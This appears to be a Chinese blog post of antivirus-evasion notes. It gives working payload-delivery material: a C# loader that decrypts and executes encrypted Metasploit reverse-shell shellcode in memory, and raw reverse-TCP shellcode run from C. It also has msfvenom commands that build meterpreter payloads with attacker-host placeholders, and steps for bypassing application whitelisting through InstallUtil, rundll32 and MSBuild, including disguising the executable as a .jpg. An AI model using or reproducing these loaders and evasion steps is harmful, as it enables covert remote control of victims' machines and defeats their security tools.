,226,195,197,8,252,30,143,101,12,102,237,119,94,83,170,20,198,129,120,235,78,251,171,1,124,58,9,31,99,6,213,2,149,106,119,232,135,121,248,178,94,160,213,45,228,252,219,100,250,250,73,47,95,68,169,90,70,33,53,244,243,59,25,206,183,44,71,26,151,227,170,96,89,146,234,198,25,238,172,5,3,99,104,170,50,122,250,212,85,2,52,229,229,208,234,239,226,167,
解密执行脚本
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Runtime.InteropServices;
using System.Threading;
using System.Reflection;
using System.Runtime.CompilerServices;
namespace NativePayload_Reverse_tcp
{
public class Program
{
public static void Main()
{
Shellcode.Exec();
}
}
class Shellcode
{
public static void Exec()
{
string Payload_Encrypted;
Payload_Encrypted = "131,215,102,95,43,231,85,224,249,228,211,81,52,51,180,142,173,177,196,6,207,183,102,60,237,142,118,207,230,18,23,123,124,244,242,200,206,148,146,88,44,31,218,145,167,138,234,147,191,8,204,84,241,157,62,61,185,206,246,111,81,242,96,71,176,238,157,252,136,37,41,216,99,173,43,145,5,35,227,107,96,133,223,23,66,119,103,104,135,218,122,111,195,165,236,71,118,252,35,26,205,206,200,51,213,96,82,62,205,179,168,69,49,15,171,55,136,51,8,170,188,212,61,187,151,110,53,164,42,246,246,198,120,143,186,82,56,41,96,12,24,242,22,213,73,8,153,94,33,16,2,84,118,150,172,122,49,141,156,144,86,108,74,135,143,5,234,228,243,182,84,159,105,246,223,46,35,95,152,64,124,47,50,59,119,89,48,145,144,66,6,197,224,52,148,17,143,132,2,22,116,200,135,44,245,113,246,149,154,205,118,108,232,218,187,141,17,67,49,158,143,191,97,120,58,206,21,34,64,185,105,90,218,211,188,182,87,185,143,112,138,239,208,157,164,170,242,200,60,133,13,49,15,12,47,23,226,195,197,8,252,30,143,101,12,102,237,119,94,83,170,20,198,129,120,235,78,251,171,1,124,58,9,31,99,6,213,2,149,106,119,232,135,121,248,178,94,160,213,45,228,252,219,100,250,250,73,47,95,68,169,90,70,33,53,244,243,59,25,206,183,44,71,26,151,227,170,96,89,146,234,198,25,238,172,5,3,99,104,170,50,122,250,212,85,2,52,229,229,208,234,239,226,167";//加密的shellcode;
string[] Payload_Encrypted_Without_delimiterChar = Payload_Encrypted.Split(',');
byte[] _X_to_Bytes = new byte[Payload_Encrypted_Without_delimiterChar.Length];
for (int i = 0; i < Payload_Encrypted_Without_delimiterChar.Length; i++)
{
byte current = Convert.ToByte(Payload_Encrypted_Without_delimiterChar[i].ToString());
_X_to_Bytes[i] = current;
}
// 解密密钥,可以更改,加解密源码中保持KEY一致就行
byte[] KEY = { 0x33, 0x11, 0x33, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x33, 0x00, 0x00, 0x00, 0x00, 0x00, 0x33, 0x00, 0x33, 0x01, 0x33, 0x33, 0x00, 0x00 };
byte[] MsfPayload = Decrypt(KEY, _X_to_Bytes);
// 加载shellcode
IntPtr returnAddr = VirtualAlloc((IntPtr)0, (uint)Math.Max(MsfPayload.Length, 0x1000), 0x3000, 0x40);
Marshal.Copy(MsfPayload, 0, returnAddr, MsfPayload.Length);
CreateThread((IntPtr)0, 0, returnAddr, (IntPtr)0, 0, (IntPtr)0);
Thread.Sleep(2000);
}
public static byte[] Decrypt(byte[] key, byte[] data)
{
return EncryptOutput(key, data).ToArray();
}
private static byte[] EncryptInitalize(byte[] key)
{
byte[] s = Enumerable.Range(0, 256)
.Select(i => (byte)i)
.ToArray();
for (int i = 0, j = 0; i < 256; i++)
{
j = (j + key[i % key.Length] + s[i]) & 255;
Swap(s, i, j);
}
return s;
}
private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data)
{
byte[] s = EncryptInitalize(key);
int i = 0;
int j = 0;
return data.Select((b) =>
{
i = (i + 1) & 255;
j = (j + s[i]) & 255;
Swap(s, i, j);
return (byte)(b ^ s[(s[i] + s[j]) & 255]);
});
}
private static void Swap(byte[] s, int i, int j)
{
byte c = s[i];
s[i] = s[j];
s[j] = c;
}
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
}
}
C#_Shellcode-白名单执行
白名单执行:(InstallUtil)
csc 简单来讲,其实就是个c# 的命令行编译工具,专门用来编译*.cs文件用的
installutil 微软官方给的解释,它允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源,暂且就简单把它理解成windows内置的一种命令行安装工具就行
编译执行:https://github.com/Jumbo-WJB/InstallUtil-Shellcode-cs/blob/master/InstallUtil-Shellcode-cs
技术来源:https://www.blackhillsinfosec.com/how-to-bypass-application-whitelisting-av/
存储目录:C:\Windows\Microsoft.NET\Framework\v2.0.50727
编译Shellcoe:
csc /unsafe /platform:x86 /out:F:\xiaodi.exe InstallUtil-ShellCode.cs exe被杀可以用下一条
csc /unsafe /platform:x86 /out:F:\xiaodi.jpg InstallUtil-ShellCode.cs jpg格式监控的没有那么严格
白名单加载执行:
InstallUtil /logfile= /LogToConsole=false /U F:\xiaodi.jpg
添加数据签名 只能搞定个管家
#知识点:
1、加壳技术
2、资源修改
3、特征码定位
python 调用dll
#include <windows.h>
#include <stdio.h>
#include "pch.h"
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x31\xff\x0f\xb7\x4a\x26"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49"
"\x75\xef\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78"
"\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x50\x8b\x58\x20\x01\xd3"
"\x85\xc9\x74\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac"
"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24"
"\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59"
"\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d"
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26"
"\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\x78\x19\xfa\x31\x68\x02"
"\x00\x1a\x20\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00"
"\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83"
"\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a"
"\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57"
"\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00"
"\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68"
"\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff"
"\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb"
"\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
void main()
{
__asm
{
mov eax, offset shellcode
jmp eax
}
}
from ctypes import *
#加载dll2.dll
lib=CDLL('dll2')
#调用当前库方法
lib.TestCtypes()
将python文件进行打包为exe,再将dll文件放在与python文件统一目录下,执行上线
#DLL注入-分离加载-Calldll
利用EXE执行后调用的DLL文件进行注入加载Shellcode
实现方式:
-自写DLL,封装shellcode到DLL中,调用DLL
-自写DLL,封装shellcode到DLL中,PE加工其他DLL调用自写DLL
0、Python&C&DLL调用(C编译DLL,Python掉DLL)
1、https://github.com/k-fire/shellcode-to-dll
2、编译DLL文件,利用PE工具导入DLL加载函数执行Shellcode
#白名单技术-MSBuild&rundll32
白名单总结:https://mp.weixin.qq.com/s/2bC5otYgIgGnod-cXwkfqw
DLL调用&白名单&特征码 rundll32
Rundll32可以执行32位的DLL文件,以命令行的方式调用动态链接程序库。
64位 C:\Windows\System32\rundll32.exe
32位 C:\Windows\SysWOW64\rundll32.exe
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xx -f dll > shell.dll
rundll32 shell32.dll,Control_RunDLL C:\Users\18536\Desktop\dd.dll
XML调用&白名单&特征码 MSBuild
Microsoft Build Engine是一个用于构建应用程序的平台,此引擎也被称为msbuild,
它为项目文件提供一个XML模式,该模式控制构建平台如何处理和构建软件。
Visual Studio使用MSBuild,但它不依赖于Visual Studio。通过在项目或解决方
案文件中调用msbuild.exe,可以在未安装Visual Studio的环境中编译和生成程序。
C:\Windows\Microsoft.NET\Framework\v4.0.30319(版本看系统)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f csharp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh -o shell.ps1
for (;;){
Start-sleep 60
}
Payload调用c#&Powershell格式Shellcode:
C:\Windows\Microsoft.NET\Framework\v4.0.30319>MSBuild C:\Users\86135\Desktop\s.xml
C:\Windows\Microsoft.NET\Framework\v4.0.30319>MSBuild C:\Users\86135\Desktop\s2.xml
还有其他的免杀方法,如花指令,加签名,资源修改,加壳,特征码修改,自定义加载器,还有经典的很多白名单技术等等
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通